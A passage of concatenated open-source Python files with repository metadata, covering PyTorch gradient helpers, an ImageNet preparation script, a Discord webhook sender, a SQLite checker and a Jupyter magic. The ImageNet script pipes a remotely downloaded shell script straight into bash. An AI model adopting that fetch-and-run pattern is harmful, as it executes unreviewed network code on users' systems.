self.HexToDec(self.getReg(DS1307_REG_WEEKDAY)) else: self.setReg(DS1307_REG_WEEKDAY, self.DecToHex(weekday%8)) def hour(self, hour = None): if hour == None: return self.HexToDec(self.getReg(DS1307_REG_HOUR)) else: self.setReg(DS1307_REG_HOUR, self.DecToHex(hour%24)) def minute(self, minute = None): if minute == None: return self.HexToDec(self.getReg(DS1307_REG_MINUTE)) else: self.setReg(DS1307_REG_MINUTE, self.DecToHex(minute%60)) def second(self, second = None): if second == None: return self.HexToDec(self.getReg(DS1307_REG_SECOND)) else: self.setReg(DS1307_REG_SECOND, self.DecToHex(second%60)) def ram(self, reg, dat = None): if dat == None: return self.getReg(DS1307_REG_RAM + (reg%56)) else: self.setReg(DS1307_REG_RAM + (reg%56), dat)
modelci/experimental/finetuner/__init__.py
FerdinandZhong/ML-Model-CI
170
12748555
<gh_stars>100-1000 #!/usr/bin/env python # -*- coding: utf-8 -*- """ Author: <NAME> Email: <EMAIL> Date: 1/12/2021 """ from pathlib import Path OUTPUT_DIR = Path.home() / 'tmp' OUTPUT_DIR.mkdir(parents=True, exist_ok=True)
openshift/installer/vendored/openshift-ansible-3.11.28-1/roles/lib_utils/test/test_sanity_checks.py
fahlmant/openshift-tools
164
12748567
<reponame>fahlmant/openshift-tools<gh_stars>100-1000 ''' Unit tests for wildcard ''' import os import sys MODULE_PATH = os.path.realpath(os.path.join(__file__, os.pardir, os.pardir, 'action_plugins')) sys.path.insert(0, MODULE_PATH) # pylint: disable=import-error,wrong-import-position,missing-docstring from sanity_checks import is_registry_match # noqa: E402 def test_is_registry_match(): ''' Test for is_registry_match ''' pat_allowall = "*" pat_docker = "docker.io" pat_subdomain = "*.example.com" pat_matchport = "registry:80" assert is_registry_match("docker.io/repo/my", pat_allowall) assert is_registry_match("example.com:4000/repo/my", pat_allowall) assert is_registry_match("192.168.127.12:4000/a/b/c", pat_allowall) assert is_registry_match("https://registry.com", pat_allowall) assert is_registry_match("example.com/openshift3/ose-${component}:${version}", pat_allowall) assert is_registry_match("docker.io/repo/my", pat_docker) assert is_registry_match("docker.io:443/repo/my", pat_docker) assert is_registry_match("docker.io/openshift3/ose-${component}:${version}", pat_allowall) assert not is_registry_match("example.com:4000/repo/my", pat_docker) assert not is_registry_match("index.docker.io/a/b/c", pat_docker) assert not is_registry_match("https://registry.com", pat_docker) assert not is_registry_match("example.com/openshift3/ose-${component}:${version}", pat_docker) assert is_registry_match("apps.foo.example.com/prefix", pat_subdomain) assert is_registry_match("sub.example.com:80", pat_subdomain) assert not is_registry_match("https://example.com:443/prefix", pat_subdomain) assert not is_registry_match("docker.io/library/my", pat_subdomain) assert not is_registry_match("https://hello.example.bar", pat_subdomain) assert is_registry_match("registry:80/prefix", pat_matchport) assert is_registry_match("registry/myapp", pat_matchport) assert is_registry_match("registry:443/myap", pat_matchport) assert not is_registry_match("https://example.com:443/prefix", pat_matchport) assert not is_registry_match("docker.io/library/my", pat_matchport) assert not is_registry_match("https://hello.registry/myapp", pat_matchport) if __name__ == '__main__': test_is_registry_match()
dalib/vision/__init__.py
xyzhu12/Transfer-Learning-Library
109
12748569
__all__ = ['datasets', 'models']
distributed training/tf-sentiment-script-mode/sentiment.py
merb92/amazon-sagemaker-keras-text-classification
106
12748573
<reponame>merb92/amazon-sagemaker-keras-text-classification import argparse import numpy as np import os import tensorflow as tf from tensorflow.contrib.eager.python import tfe from keras.models import Sequential from keras.layers import Dense, Dropout, Activation from keras.layers import Embedding from keras.layers import Conv1D, GlobalMaxPooling1D tf.logging.set_verbosity(tf.logging.ERROR) max_features = 20000 maxlen = 400 embedding_dims = 300 filters = 250 kernel_size = 3 hidden_dims = 250 def parse_args(): parser = argparse.ArgumentParser() # hyperparameters sent by the client are passed as command-line arguments to the script parser.add_argument('--epochs', type=int, default=1) parser.add_argument('--batch_size', type=int, default=64) # data directories parser.add_argument('--train', type=str, default=os.environ.get('SM_CHANNEL_TRAIN')) parser.add_argument('--test', type=str, default=os.environ.get('SM_CHANNEL_TEST')) # model directory: we will use the default set by SageMaker, /opt/ml/model parser.add_argument('--model_dir', type=str, default=os.environ.get('SM_MODEL_DIR')) return parser.parse_known_args() def get_train_data(train_dir): x_train = np.load(os.path.join(train_dir, 'x_train.npy')) y_train = np.load(os.path.join(train_dir, 'y_train.npy')) print('x train', x_train.shape,'y train', y_train.shape) return x_train, y_train def get_test_data(test_dir): x_test = np.load(os.path.join(test_dir, 'x_test.npy')) y_test = np.load(os.path.join(test_dir, 'y_test.npy')) print('x test', x_test.shape,'y test', y_test.shape) return x_test, y_test def get_model(): embedding_layer = tf.keras.layers.Embedding(max_features, embedding_dims, input_length=maxlen) sequence_input = tf.keras.Input(shape=(maxlen,), dtype='int32') embedded_sequences = embedding_layer(sequence_input) x = tf.keras.layers.Dropout(0.2)(embedded_sequences) x = tf.keras.layers.Conv1D(filters, kernel_size, padding='valid', activation='relu', strides=1)(x) x = tf.keras.layers.MaxPooling1D()(x) x = tf.keras.layers.GlobalMaxPooling1D()(x) x = tf.keras.layers.Dense(hidden_dims, activation='relu')(x) x = tf.keras.layers.Dropout(0.2)(x) preds = tf.keras.layers.Dense(1, activation='sigmoid')(x) return tf.keras.Model(sequence_input, preds) if __name__ == "__main__": args, _ = parse_args() x_train, y_train = get_train_data(args.train) x_test, y_test = get_test_data(args.test) model = get_model() model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) model.fit(x_train, y_train, batch_size=args.batch_size, epochs=args.epochs, validation_data=(x_test, y_test)) # create a TensorFlow SavedModel for deployment to a SageMaker endpoint with TensorFlow Serving tf.contrib.saved_model.save_keras_model(model, args.model_dir)
torch/nn/grad.py
Hacky-DH/pytorch
60,067
12748595
<reponame>Hacky-DH/pytorch<filename>torch/nn/grad.py """Gradient interface""" import torch from .modules.utils import _single, _pair, _triple import warnings def _grad_input_padding(grad_output, input_size, stride, padding, kernel_size, dilation=None): if dilation is None: # For backward compatibility warnings.warn("_grad_input_padding 'dilation' argument not provided. Default of 1 is used.") dilation = [1] * len(stride) input_size = list(input_size) k = grad_output.dim() - 2 if len(input_size) == k + 2: input_size = input_size[-k:] if len(input_size) != k: raise ValueError("input_size must have {} elements (got {})" .format(k + 2, len(input_size))) def dim_size(d): return ((grad_output.size(d + 2) - 1) * stride[d] - 2 * padding[d] + 1 + dilation[d] * (kernel_size[d] - 1)) min_sizes = [dim_size(d) for d in range(k)] max_sizes = [min_sizes[d] + stride[d] - 1 for d in range(k)] for size, min_size, max_size in zip(input_size, min_sizes, max_sizes): if size < min_size or size > max_size: raise ValueError( ("requested an input grad size of {}, but valid sizes range " "from {} to {} (for a grad_output of {})").format( input_size, min_sizes, max_sizes, grad_output.size()[2:])) return tuple(input_size[d] - min_sizes[d] for d in range(k)) def conv1d_input(input_size, weight, grad_output, stride=1, padding=0, dilation=1, groups=1): r""" Computes the gradient of conv1d with respect to the input of the convolution. This is same as the 1D transposed convolution operator under the hood but requires the shape of the gradient w.r.t. input to be specified explicitly. Args: input_size : Shape of the input gradient tensor weight: weight tensor (out_channels x in_channels/groups x kW) grad_output : output gradient tensor (minibatch x out_channels x oW) stride (int or tuple, optional): Stride of the convolution. Default: 1 padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0 dilation (int or tuple, optional): Spacing between kernel elements. Default: 1 groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1 Examples:: >>> input = torch.randn(1,1,3, requires_grad=True) >>> weight = torch.randn(1,1,1, requires_grad=True) >>> output = F.conv1d(input, weight) >>> grad_output = torch.randn(output.shape) >>> grad_input = torch.autograd.grad(output, input, grad_output) >>> F.grad.conv1d_input(input.shape, weight, grad_output) """ stride = _single(stride) padding = _single(padding) dilation = _single(dilation) kernel_size = [weight.shape[2]] if input_size is None: raise ValueError("grad.conv1d_input requires specifying an input_size") grad_input_padding = _grad_input_padding(grad_output, input_size, stride, padding, kernel_size, dilation) return torch.conv_transpose1d( grad_output, weight, None, stride, padding, grad_input_padding, groups, dilation) def conv1d_weight(input, weight_size, grad_output, stride=1, padding=0, dilation=1, groups=1): r""" Computes the gradient of conv1d with respect to the weight of the convolution. Args: input: input tensor of shape (minibatch x in_channels x iW) weight_size : Shape of the weight gradient tensor grad_output : output gradient tensor (minibatch x out_channels x oW) stride (int or tuple, optional): Stride of the convolution. Default: 1 padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0 dilation (int or tuple, optional): Spacing between kernel elements. Default: 1 groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1 Examples:: >>> input = torch.randn(1,1,3, requires_grad=True) >>> weight = torch.randn(1,1,1, requires_grad=True) >>> output = F.conv1d(input, weight) >>> grad_output = torch.randn(output.shape) >>> grad_weight = torch.autograd.grad(output, filter, grad_output) >>> F.grad.conv1d_weight(input, weight.shape, grad_output) """ stride = _single(stride) padding = _single(padding) dilation = _single(dilation) in_channels = input.shape[1] out_channels = grad_output.shape[1] min_batch = input.shape[0] grad_output = grad_output.contiguous().repeat(1, in_channels // groups, 1) grad_output = grad_output.contiguous().view( grad_output.shape[0] * grad_output.shape[1], 1, grad_output.shape[2]) input = input.contiguous().view(1, input.shape[0] * input.shape[1], input.shape[2]) grad_weight = torch.conv1d(input, grad_output, None, dilation, padding, stride, in_channels * min_batch) grad_weight = grad_weight.contiguous().view( min_batch, grad_weight.shape[1] // min_batch, grad_weight.shape[2]) return grad_weight.sum(dim=0).view( in_channels // groups, out_channels, grad_weight.shape[2]).transpose( 0, 1).narrow(2, 0, weight_size[2]) def conv2d_input(input_size, weight, grad_output, stride=1, padding=0, dilation=1, groups=1): r""" Computes the gradient of conv2d with respect to the input of the convolution. This is same as the 2D transposed convolution operator under the hood but requires the shape of the gradient w.r.t. input to be specified explicitly. Args: input_size : Shape of the input gradient tensor weight: weight tensor (out_channels x in_channels/groups x kH x kW) grad_output : output gradient tensor (minibatch x out_channels x oH x oW) stride (int or tuple, optional): Stride of the convolution. Default: 1 padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0 dilation (int or tuple, optional): Spacing between kernel elements. Default: 1 groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1 Examples:: >>> input = torch.randn(1,1,3,3, requires_grad=True) >>> weight = torch.randn(1,1,1,2, requires_grad=True) >>> output = F.conv2d(input, weight) >>> grad_output = torch.randn(output.shape) >>> grad_input = torch.autograd.grad(output, input, grad_output) >>> F.grad.conv2d_input(input.shape, weight, grad_output) """ stride = _pair(stride) padding = _pair(padding) dilation = _pair(dilation) kernel_size = (weight.shape[2], weight.shape[3]) if input_size is None: raise ValueError("grad.conv2d_input requires specifying an input_size") grad_input_padding = _grad_input_padding(grad_output, input_size, stride, padding, kernel_size, dilation) return torch.conv_transpose2d( grad_output, weight, None, stride, padding, grad_input_padding, groups, dilation) def conv2d_weight(input, weight_size, grad_output, stride=1, padding=0, dilation=1, groups=1): r""" Computes the gradient of conv2d with respect to the weight of the convolution. Args: input: input tensor of shape (minibatch x in_channels x iH x iW) weight_size : Shape of the weight gradient tensor grad_output : output gradient tensor (minibatch x out_channels x oH x oW) stride (int or tuple, optional): Stride of the convolution. Default: 1 padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0 dilation (int or tuple, optional): Spacing between kernel elements. Default: 1 groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1 Examples:: >>> input = torch.randn(1,1,3,3, requires_grad=True) >>> weight = torch.randn(1,1,1,2, requires_grad=True) >>> output = F.conv2d(input, weight) >>> grad_output = torch.randn(output.shape) >>> grad_weight = torch.autograd.grad(output, filter, grad_output) >>> F.grad.conv2d_weight(input, weight.shape, grad_output) """ stride = _pair(stride) padding = _pair(padding) dilation = _pair(dilation) in_channels = input.shape[1] out_channels = grad_output.shape[1] min_batch = input.shape[0] grad_output = grad_output.contiguous().repeat(1, in_channels // groups, 1, 1) grad_output = grad_output.contiguous().view( grad_output.shape[0] * grad_output.shape[1], 1, grad_output.shape[2], grad_output.shape[3]) input = input.contiguous().view(1, input.shape[0] * input.shape[1], input.shape[2], input.shape[3]) grad_weight = torch.conv2d(input, grad_output, None, dilation, padding, stride, in_channels * min_batch) grad_weight = grad_weight.contiguous().view( min_batch, grad_weight.shape[1] // min_batch, grad_weight.shape[2], grad_weight.shape[3]) return grad_weight.sum(dim=0).view( in_channels // groups, out_channels, grad_weight.shape[2], grad_weight.shape[3]).transpose(0, 1).narrow( 2, 0, weight_size[2]).narrow(3, 0, weight_size[3]) def conv3d_input(input_size, weight, grad_output, stride=1, padding=0, dilation=1, groups=1): r""" Computes the gradient of conv3d with respect to the input of the convolution. This is same as the 3D transposed convolution operator under the hood but requires the shape of the gradient w.r.t. input to be specified explicitly. Args: input_size : Shape of the input gradient tensor weight: weights tensor (out_channels x in_channels/groups x kT x kH x kW) grad_output : output gradient tensor (minibatch x out_channels x oT x oH x oW) stride (int or tuple, optional): Stride of the convolution. Default: 1 padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0 dilation (int or tuple, optional): Spacing between kernel elements. Default: 1 groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1 Examples:: >>> input = torch.randn(2, 8, 10, 10, 20, requires_grad=True) >>> weight = torch.randn(4, 8, 2, 3, 3, requires_grad=True) >>> output = F.conv3d(input, weight) >>> grad_output = torch.randn(output.shape) >>> grad_input = torch.autograd.grad(output, input, grad_output) >>> F.grad.conv3d_input(input.shape, weight, grad_output) """ stride = _triple(stride) padding = _triple(padding) dilation = _triple(dilation) kernel_size = (weight.shape[2], weight.shape[3], weight.shape[4]) if input_size is None: raise ValueError("grad.conv3d_input requires specifying an input_size") grad_input_padding = _grad_input_padding(grad_output, input_size, stride, padding, kernel_size, dilation) return torch.conv_transpose3d( grad_output, weight, None, stride, padding, grad_input_padding, groups, dilation) def conv3d_weight(input, weight_size, grad_output, stride=1, padding=0, dilation=1, groups=1): r""" Computes the gradient of conv3d with respect to the weight of the convolution. Args: input: input tensor of shape (minibatch x in_channels x iT x iH x iW) weight_size : Shape of the weight gradient tensor grad_output : output gradient tensor (minibatch x out_channels x oT x oH x oW) stride (int or tuple, optional): Stride of the convolution. Default: 1 padding (int or tuple, optional): Zero-padding added to both sides of the input. Default: 0 dilation (int or tuple, optional): Spacing between kernel elements. Default: 1 groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1 Examples:: >>> input = torch.randn(2, 8, 10, 10, 20, requires_grad=True) >>> weight = torch.randn(4, 8, 2, 3, 3, requires_grad=True) >>> output = F.conv3d(input, weight) >>> grad_output = torch.randn(output.shape) >>> grad_weight = torch.autograd.grad(output, weight, grad_output) >>> F.grad.conv3d_weight(input, weight.shape, grad_output) """ stride = _triple(stride) padding = _triple(padding) dilation = _triple(dilation) in_channels = input.shape[1] out_channels = grad_output.shape[1] min_batch = input.shape[0] grad_output = grad_output.repeat(1, in_channels // groups, 1, 1, 1) grad_output = grad_output.contiguous().view( grad_output.shape[0] * grad_output.shape[1], 1, grad_output.shape[2], grad_output.shape[3], grad_output.shape[4]) input = input.contiguous().view(1, input.shape[0] * input.shape[1], input.shape[2], input.shape[3], input.shape[4]) grad_weight = torch.conv3d(input, grad_output, None, dilation, padding, stride, in_channels * min_batch) grad_weight = grad_weight.contiguous().view( min_batch, grad_weight.shape[1] // min_batch, grad_weight.shape[2], grad_weight.shape[3], grad_weight.shape[4]) return grad_weight.sum(dim=0).view( in_channels // groups, out_channels, grad_weight.shape[2], grad_weight.shape[3], grad_weight.shape[4]).transpose(0, 1).narrow( 2, 0, weight_size[2]).narrow(3, 0, weight_size[3]).narrow( 4, 0, weight_size[4])
pyalgotrade/optimizer/server.py
cdyfng/pyalgotrade
1,000
12748617
# PyAlgoTrade # # Copyright 2011-2015 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ .. moduleauthor:: <NAME> <<EMAIL>> """ import pyalgotrade.logger from pyalgotrade.optimizer import base from pyalgotrade.optimizer import xmlrpcserver logger = pyalgotrade.logger.getLogger(__name__) class Results(object): """The results of the strategy executions.""" def __init__(self, parameters, result): self.__parameters = parameters self.__result = result def getParameters(self): """Returns a sequence of parameter values.""" return self.__parameters def getResult(self): """Returns the result for a given set of parameters.""" return self.__result def serve(barFeed, strategyParameters, address, port): """Executes a server that will provide bars and strategy parameters for workers to use. :param barFeed: The bar feed that each worker will use to backtest the strategy. :type barFeed: :class:`pyalgotrade.barfeed.BarFeed`. :param strategyParameters: The set of parameters to use for backtesting. An iterable object where **each element is a tuple that holds parameter values**. :param address: The address to listen for incoming worker connections. :type address: string. :param port: The port to listen for incoming worker connections. :type port: int. :rtype: A :class:`Results` instance with the best results found or None if no results were obtained. """ paramSource = base.ParameterSource(strategyParameters) resultSinc = base.ResultSinc() s = xmlrpcserver.Server(paramSource, resultSinc, barFeed, address, port) logger.info("Starting server") s.serve() logger.info("Server finished") ret = None bestResult, bestParameters = resultSinc.getBest() if bestResult is not None: logger.info("Best final result %s with parameters %s" % (bestResult, bestParameters.args)) ret = Results(bestParameters.args, bestResult) else: logger.error("No results. All jobs failed or no jobs were processed.") return ret
build_files/buildbot/codesign/config_server_template.py
intrigus/blender-1
116
12748625
# ##### BEGIN GPL LICENSE BLOCK ##### # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software Foundation, # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # ##### END GPL LICENSE BLOCK ##### # <pep8 compliant> # Configuration of a code signer which is specific to the code signing server. # # NOTE: DO NOT put any sensitive information here, put it in an actual # configuration on the signing machine. from pathlib import Path from codesign.config_common import * # URL to the timestamping authority. TIMESTAMP_AUTHORITY_URL = 'http://timestamp.digicert.com' # Full path to the certificate used for signing. # # The path and expected file format might vary depending on a platform. # # On Windows it is usually is a PKCS #12 key (.pfx), so the path will look # like Path('C:\\Secret\\Blender.pfx'). CERTIFICATE_FILEPATH: Path # https://docs.python.org/3/library/logging.config.html#configuration-dictionary-schema LOGGING = { 'version': 1, 'formatters': { 'default': {'format': '%(asctime)-15s %(levelname)8s %(name)s %(message)s'} }, 'handlers': { 'console': { 'class': 'logging.StreamHandler', 'formatter': 'default', 'stream': 'ext://sys.stderr', } }, 'loggers': { 'codesign': {'level': 'INFO'}, }, 'root': { 'level': 'WARNING', 'handlers': [ 'console', ], } }
finalists/yc14600/PyTorch-Encoding/scripts/prepare_imagenet.py
lrzpellegrini/cvpr_clvision_challenge
2,190
12748635
"""Prepare the ImageNet dataset""" import os import argparse import tarfile import pickle import gzip import subprocess from tqdm import tqdm import subprocess from encoding.utils import check_sha1, download, mkdir _TARGET_DIR = os.path.expanduser('~/.encoding/data/ILSVRC2012') _TRAIN_TAR = 'ILSVRC2012_img_train.tar' _TRAIN_TAR_SHA1 = '43eda4fe35c1705d6606a6a7a633bc965d194284' _VAL_TAR = 'ILSVRC2012_img_val.tar' _VAL_TAR_SHA1 = '5f3f73da3395154b60528b2b2a2caf2374f5f178' def parse_args(): parser = argparse.ArgumentParser( description='Setup the ImageNet dataset.', formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--download-dir', required=True, help="The directory that contains downloaded tar files") parser.add_argument('--target-dir', default=_TARGET_DIR, help="The directory to store extracted images") parser.add_argument('--checksum', action='store_true', help="If check integrity before extracting.") parser.add_argument('--with-rec', action='store_true', help="If build image record files.") parser.add_argument('--num-thread', type=int, default=1, help="Number of threads to use when building image record file.") args = parser.parse_args() return args def check_file(filename, checksum, sha1): if not os.path.exists(filename): raise ValueError('File not found: '+filename) if checksum and not check_sha1(filename, sha1): raise ValueError('Corrupted file: '+filename) def extract_train(tar_fname, target_dir, with_rec=False, num_thread=1): mkdir(target_dir) with tarfile.open(tar_fname) as tar: print("Extracting "+tar_fname+"...") # extract each class one-by-one pbar = tqdm(total=len(tar.getnames())) for class_tar in tar: pbar.set_description('Extract '+class_tar.name) tar.extract(class_tar, target_dir) class_fname = os.path.join(target_dir, class_tar.name) class_dir = os.path.splitext(class_fname)[0] os.mkdir(class_dir) with tarfile.open(class_fname) as f: f.extractall(class_dir) os.remove(class_fname) pbar.update(1) pbar.close() def extract_val(tar_fname, target_dir, with_rec=False, num_thread=1): mkdir(target_dir) print('Extracting ' + tar_fname) with tarfile.open(tar_fname) as tar: tar.extractall(target_dir) # build rec file before images are moved into subfolders # move images to proper subfolders subprocess.call(["wget -qO- https://raw.githubusercontent.com/soumith/imagenetloader.torch/master/valprep.sh | bash"], cwd=target_dir, shell=True) def main(): args = parse_args() target_dir = os.path.expanduser(args.target_dir) #if os.path.exists(target_dir): # raise ValueError('Target dir ['+target_dir+'] exists. Remove it first') download_dir = os.path.expanduser(args.download_dir) train_tar_fname = os.path.join(download_dir, _TRAIN_TAR) check_file(train_tar_fname, args.checksum, _TRAIN_TAR_SHA1) val_tar_fname = os.path.join(download_dir, _VAL_TAR) check_file(val_tar_fname, args.checksum, _VAL_TAR_SHA1) build_rec = args.with_rec if build_rec: os.makedirs(os.path.join(target_dir, 'rec')) extract_train(train_tar_fname, os.path.join(target_dir, 'train'), build_rec, args.num_thread) extract_val(val_tar_fname, os.path.join(target_dir, 'val'), build_rec, args.num_thread) if __name__ == '__main__': main()
tests/test_provider_vmware_vmc.py
mjuenema/python-terrascript
507
12748637
# tests/test_provider_vmware_vmc.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:30:35 UTC) def test_provider_import(): import terrascript.provider.vmware.vmc def test_resource_import(): from terrascript.resource.vmware.vmc import vmc_cluster from terrascript.resource.vmware.vmc import vmc_public_ip from terrascript.resource.vmware.vmc import vmc_sddc from terrascript.resource.vmware.vmc import vmc_site_recovery from terrascript.resource.vmware.vmc import vmc_srm_node def test_datasource_import(): from terrascript.data.vmware.vmc import vmc_connected_accounts from terrascript.data.vmware.vmc import vmc_customer_subnets from terrascript.data.vmware.vmc import vmc_org from terrascript.data.vmware.vmc import vmc_sddc # TODO: Shortcut imports without namespace for official and supported providers. # TODO: This has to be moved into a required_providers block. # def test_version_source(): # # import terrascript.provider.vmware.vmc # # t = terrascript.provider.vmware.vmc.vmc() # s = str(t) # # assert 'https://github.com/vmware/terraform-provider-vmc' in s # assert '1.7.0' in s
sqlite_table_check.py
nicetone/Python
28,321
12748653
<reponame>nicetone/Python # Script Name : sqlite_table_check.py # Author : <NAME> # Created : 07 June 2013 # Last Modified : # Version : 1.0 # Modifications : # Description : Checks the main SQLITE database to ensure all the tables should exist import os import sqlite3 dropbox = os.getenv("dropbox") config = os.getenv("my_config") dbfile = ("Databases\jarvis.db") listfile = ("sqlite_master_table.lst") master_db = os.path.join(dropbox, dbfile) config_file = os.path.join(config, listfile) tablelist = open(config_file, 'r'); conn = sqlite3.connect(master_db) cursor = conn.cursor() cursor.execute('SELECT SQLITE_VERSION()') data = cursor.fetchone() if str(data) == "(u'3.6.21',)": print("\nCurrently " + master_db + " is on SQLite version: %s" % data + " - OK -\n") else: print("\nDB On different version than master version - !!!!! \n") conn.close() print("\nCheckling " + master_db + " against " + config_file + "\n") for table in tablelist.readlines(): conn = sqlite3.connect(master_db) cursor = conn.cursor() cursor.execute("select count(*) from sqlite_master where name = ?", (table.strip(),)) res = cursor.fetchone() if (res[0]): print('[+] Table : ' + table.strip() + ' exists [+]') else: print('[-] Table : ' + table.strip() + ' does not exist [-]')
Src/StdLib/Lib/whichdb.py
cwensley/ironpython2
6,989
12748662
# !/usr/bin/env python """Guess which db package to use to open a db file.""" import os import struct import sys try: import dbm _dbmerror = dbm.error except ImportError: dbm = None # just some sort of valid exception which might be raised in the # dbm test _dbmerror = IOError def whichdb(filename): """Guess which db package to use to open a db file. Return values: - None if the database file can't be read; - empty string if the file can be read but can't be recognized - the module name (e.g. "dbm" or "gdbm") if recognized. Importing the given module may still fail, and opening the database using that module may still fail. """ # Check for dbm first -- this has a .pag and a .dir file try: f = open(filename + os.extsep + "pag", "rb") f.close() # dbm linked with gdbm on OS/2 doesn't have .dir file if not (dbm.library == "GNU gdbm" and sys.platform == "os2emx"): f = open(filename + os.extsep + "dir", "rb") f.close() return "dbm" except IOError: # some dbm emulations based on Berkeley DB generate a .db file # some do not, but they should be caught by the dbhash checks try: f = open(filename + os.extsep + "db", "rb") f.close() # guarantee we can actually open the file using dbm # kind of overkill, but since we are dealing with emulations # it seems like a prudent step if dbm is not None: d = dbm.open(filename) d.close() return "dbm" except (IOError, _dbmerror): pass # Check for dumbdbm next -- this has a .dir and a .dat file try: # First check for presence of files os.stat(filename + os.extsep + "dat") size = os.stat(filename + os.extsep + "dir").st_size # dumbdbm files with no keys are empty if size == 0: return "dumbdbm" f = open(filename + os.extsep + "dir", "rb") try: if f.read(1) in ("'", '"'): return "dumbdbm" finally: f.close() except (OSError, IOError): pass # See if the file exists, return None if not try: f = open(filename, "rb") except IOError: return None # Read the start of the file -- the magic number s16 = f.read(16) f.close() s = s16[0:4] # Return "" if not at least 4 bytes if len(s) != 4: return "" # Convert to 4-byte int in native byte order -- return "" if impossible try: (magic,) = struct.unpack("=l", s) except struct.error: return "" # Check for GNU dbm if magic in (0x13579ace, 0x13579acd, 0x13579acf): return "gdbm" # Check for old Berkeley db hash file format v2 if magic in (0x00061561, 0x61150600): return "bsddb185" # Later versions of Berkeley db hash file have a 12-byte pad in # front of the file type try: (magic,) = struct.unpack("=l", s16[-4:]) except struct.error: return "" # Check for BSD hash if magic in (0x00061561, 0x61150600): return "dbhash" # Unknown return "" if __name__ == "__main__": for filename in sys.argv[1:]: print whichdb(filename) or "UNKNOWN", filename
discord_embedded_message/message.py
sonalimahajan12/Automation-scripts
496
12748674
import datetime import json import requests def send_message( webhook_url: str, content_msg="", title="", title_url="", color=00000000, timestamp=datetime.datetime.now().isoformat(), footer_icon="", footer="", thumbnail_url="", author="", author_url="", author_icon_url="", text_name="", text="", ): payload = { "content": content_msg, "embeds": [ { "title": title, "url": title_url, "color": color, "timestamp": timestamp, "footer": { "icon_url": footer_icon, "text": footer, }, "thumbnail": {"url": thumbnail_url}, "author": { "name": author, "url": author_url, "icon_url": author_icon_url, }, "fields": [ { "name": text_name, "value": text, } ], } ], } print(">> Sending To WebHook...") payload = json.dumps(payload) headers = {"Content-Type": "application/json"} response = requests.post(webhook_url, headers=headers, data=payload) return response def example_calling(): webhook_url = "your_webhook_url" response = send_message( webhook_url, content_msg="Some random text", title="Discord Embed example", title_url="https://discordjs.guide/popular-topics/embeds.html#embed-preview", color=15335679, footer_icon="https://github.githubassets.com/favicons/favicon-dark.png", footer="May the Force be with you", thumbnail_url="https://avatars.githubusercontent.com/u/55619686", author="OjusWiZard", author_url="https://github.com/OjusWiZard/", author_icon_url="https://avatars.githubusercontent.com/u/55619686", text_name=":point_down: :point_down: :point_down:", text="This is a test message", ) print("Status: ", response.status_code) if __name__ == "__main__": example_calling()
fugue_notebook/env.py
fugue-project/fugue
547
12748697
<reponame>fugue-project/fugue # pylint: disable=W0611,W0613 import html import json from typing import Any, Callable, Dict, List import fugue_sql import pandas as pd from fugue import ( ExecutionEngine, NativeExecutionEngine, make_execution_engine, register_execution_engine, ) from fugue.dataframe import YieldedDataFrame from fugue.extensions._builtins.outputters import Show from IPython.core.magic import Magics, cell_magic, magics_class, needs_local_scope from IPython.display import HTML, display from triad import ParamDict, Schema from triad.utils.convert import to_instance class NotebookSetup(object): """Jupyter notebook environment customization template.""" def get_pre_conf(self) -> Dict[str, Any]: """The default config for all registered execution engine""" return {} def get_post_conf(self) -> Dict[str, Any]: """The enforced config for all registered execution engine. Users should not set these configs manually, if they set, the values must match this dict, otherwise, exceptions will be thrown """ return {} def get_pretty_print(self) -> Callable: """Fugue dataframe pretty print handler""" return _default_pretty_print def register_execution_engines(self): """Register execution engines with names. This will also try to register spark and dask engines if the dependent packages are available and they are not registered""" register_execution_engine( "native", lambda conf, **kwargs: NativeExecutionEngine(conf=conf), on_dup="ignore", ) try: import pyspark # noqa: F401 import fugue_spark # noqa: F401 except ImportError: pass try: import dask.dataframe # noqa: F401 import fugue_dask # noqa: F401 except ImportError: pass @magics_class class _FugueSQLMagics(Magics): """Fugue SQL Magics""" def __init__( self, shell: Any, pre_conf: Dict[str, Any], post_conf: Dict[str, Any], fsql_ignore_case: bool = False, ): # You must call the parent constructor super().__init__(shell) self._pre_conf = pre_conf self._post_conf = post_conf self._fsql_ignore_case = fsql_ignore_case @needs_local_scope @cell_magic("fsql") def fsql(self, line: str, cell: str, local_ns: Any = None) -> None: dag = fugue_sql.fsql(cell, local_ns, fsql_ignore_case=self._fsql_ignore_case) dag.run(self.get_engine(line, {} if local_ns is None else local_ns)) for k, v in dag.yields.items(): if isinstance(v, YieldedDataFrame): local_ns[k] = v.result # type: ignore else: local_ns[k] = v # type: ignore def get_engine(self, line: str, lc: Dict[str, Any]) -> ExecutionEngine: line = line.strip() p = line.find("{") if p >= 0: engine = line[:p].strip() conf = json.loads(line[p:]) else: parts = line.split(" ", 1) engine = parts[0] conf = ParamDict(None if len(parts) == 1 else lc[parts[1]]) cf = dict(self._pre_conf) cf.update(conf) for k, v in self._post_conf.items(): if k in cf and cf[k] != v: raise ValueError( f"{k} must be {v}, but you set to {cf[k]}, you may unset it" ) cf[k] = v if 